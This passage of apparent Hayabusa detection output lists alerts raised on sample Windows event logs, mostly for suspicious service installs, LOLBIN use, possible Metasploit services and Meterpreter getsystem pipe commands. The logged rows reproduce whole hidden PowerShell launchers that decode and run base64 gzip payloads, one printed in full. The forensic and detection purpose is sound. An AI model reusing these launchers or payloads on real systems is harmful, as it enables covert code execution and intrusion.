kca+BiTB8A1XhldBva7QYkji3VGGLUmW0NVi+NuGdULdFjzULIk9rQeRtGjvtPVouVwZ/i5M3ZVuCkvVb1yt7JdVVXXdb1pT4qbL7eXZa3wUFnSJbsvOerV4IsWrJte99FzesPL/qazvYf9BqpqfUz0AwLKiF2r3LjCV1E1PJHEa7d/G4eRjxlIBW70tHANHhrH67nLaRIhy889e0HCgDDoc9AJU9UjxriddIun2xy61aGHzKCABzA8L/1ypEhPjspzE0lfXV9PAC7U0pPM8y0SeMLPFTbnhQJ0g8KmXICjv/2cFb7ays/r5ZKWckrai83YfjMlqbgM3/Xsi0t+rv8PtB4r3ocf5y20Pr/7F+ubqC7kXpDxk/Xli//E/O9RMcRUgLsJtxcjh776OiNHTZ18jTxlDRTjHp/k4/A2Fmcd+FL5G8KtLTuVCgAA''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.034 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:38:04.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xc40 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.087 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:38:04.643 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 
IO.MemoryStream(,[Convert]::FromBase64String(''H4sIALxR4FcCA7VWf2/aSBD9O5X6HawKCVslGAhpmkiVbo0xEDABHCCGotPGXpuFxUvs5Wev3/3GYDdUTar0pLMSseuZ2X375s2OvVXgCMoDaYltQ/r2/t1ZB4d4IckZl667NmZ2Tsp4wa7aLClnZ2DOrM1OoNXYcqTXpC+SPEbLpc4XmAaTm5vKKgxJII7zfI0IFEVk8cgoiWRF+kcaTklIzu8eZ8QR0jcp83e+xvgjZonbroKdKZHOUeDGthZ3cIwtby0ZFXL269esMj4vTvLVpxVmkZy1dpEgi7zLWFaRvivxhve7JZGzJnVCHnFP5Ic0uCjl+0GEPdKG1dbEJGLK3SirwGHgLyRiFQbS6bHidY5echaGnZA7yHVDEkFQvhGs+ZzImWDFWE76Sx4nIHqrQNAFAbsgIV9aJFxTh0T5Og5cRnrEm8htsknP/tYg+TQIvDoiVHKQnNfRmtxdMXJcIKv8ivdHXhV4nnMLbHx//+79Oy/VQ3TZs4K/69v1qShgdDY+jAkAljs8ogfnL1IhJ5mwJxY83ME0cx+uiDKRxnE+xpOJlGHuZTn3enwxdQbXPbl4uIR34wGn7gRiklRlvO4wWG/KmMbG13WnE48GRN8FeEGdVFryS/QTj5HDcfOpWxugydnEQFydMOJjETOZk8a/hlUXVPyI1VaUuSREDqQwAlSQXeVnMMfkyNlGYJIFMHWcZ+M0gKBJ6p2IeJfuHs/BKVthOIpyUmcFFeXkJItgRtychIKIJia0EvwwzD7DNVdMUAdHIl1uovxEZrJphQeRCFcOZBAIuLeWxKGYxXzkpDp1ibazqJ9unn2RjQpmjAY+rLSGbMCbmAVLxLoIAedBA0reIqKxWDKyAJ9DfRsM+1DNSTEchIR94mZfhJlK/ajrmJWUjhOQkGqLcZGTBjQUcFfEDB9U9d9AnFwTz3AqIUlSI6fFM9Z2IlZ7ZtrdOsOeE8s0YenASSiADyPkCw1H5FPZEiGwJX9Q72gFwWM3AmY62pwW0YYWGyb89+lFg+tXbvN2VldDfTv1UCNqmPWO3q3Xy+tba1AWVrUhmp2GMKsPs5mF6r2+LUYNVL+nhbld3i9v6d5qIdfeqp/22n5T0Lb7me96tu55/pVn9YqXBm0NK12tUMItvbpqDbWNVihHVbqpd2m/O781xKM9YLjvqf5D8RrTbSucDYrc3DcQqk0vnP2tN6hNTXdn19XrYXmOqghVgurA0HjT1kLUUQfYH/BNc1ZjQ7+CNMOhZNTtG1q3a2ioX5s96deqD7EPeKoNByU6Wj70pjA3AEJTLZQbLtlzuwsk1TjCfg98/ErJmXrgo39E2sc2j0p4rnGkgY8xegJc9tLoMLDf90scDVj7AaPWaGeoatHulFG9QIc1H8VLYl/rYhSt9b2uFgcud4eXbdtTBw/sStUr90vHU1V1U9ebzqi4/Xx3VdYKT5UFXbDHkqte9z9rwabpd9a+2x1e9bbt3SPs11fVwYdYOyCezGJ2vTSvTtTw2r1v4jCaYgYqgZs8LVeDh0ZyK3c4jSNk+dCt5yQMCIP2Bg0wVTpijDtxi3i+v6FHHTvHBIq2D8OL0osjRfrhqDw3jvTVzc0IoEL9JNrOt0jgi2musL0oFOD2L2zLBTjv209Y4cudnK6WixtIwtPJHuywhxLXVsaf96In1Pp/WUyKego/7ptYfH73G+ubmC3k0vP/Yvj5xR+x/McMDDEV4GnBzcTIsV3+hohEOSffGUmaQBde8sQffncrcd6GL5B/AQG25GNvCgAA''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.659 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: TDhDnlnsrKrQVnjY | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 05:59:41.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0xe28 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.680 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object 
IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd2c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 05:59:41.854 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:23.453 +09:00,IE10Win7,7045,info,,New Service Installed,Name: QPFRRKggYorFrGnJ | Path: %SYSTEMROOT%\OJuUfMOy.exe | Account: LocalSystem | Start Type: 
demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:00:33.473 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb1c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:00:33.590 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SpyNetService -RestrictPrivileges -AccessKey CC5A59EB-39B8-70D1-D323-21B5170E809F -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xd30 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:08:05.647 +09:00,IE10Win7,7045,info,,New Service Installed,Name: KAyUYDrNOKClCGXL | Path: %SYSTEMROOT%\BRMPXyFc.exe | Account: LocalSystem | Start Type: demand 
start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.677 +09:00,IE10Win7,7045,info,,New Service Installed,Name: adsymn | Path: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:12:10.682 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo adsymn > \\.\pipe\adsymn | Path: C:\Windows\System32\cmd.exe | PID: 0x3dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:12:45.349 
+09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MetasploitServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:12:45.349 +09:00,IE10Win7,7045,info,,New Service Installed,Name: xnQMIQKvTLVeKYjo | Path: %SYSTEMROOT%\LCCxAHbh.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk,rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.090 +09:00,IE10Win7,7045,info,,New Service Installed,Name: hmoopk | Path: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:13:04.094 
+09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleMeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:13:04.094 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hmoopk > \\.\pipe\hmoopk | Path: C:\Windows\System32\cmd.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.125 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: aCshIvAdgRYNApEv | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 06:23:37.132 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 
4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''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''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c 
$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('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'));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 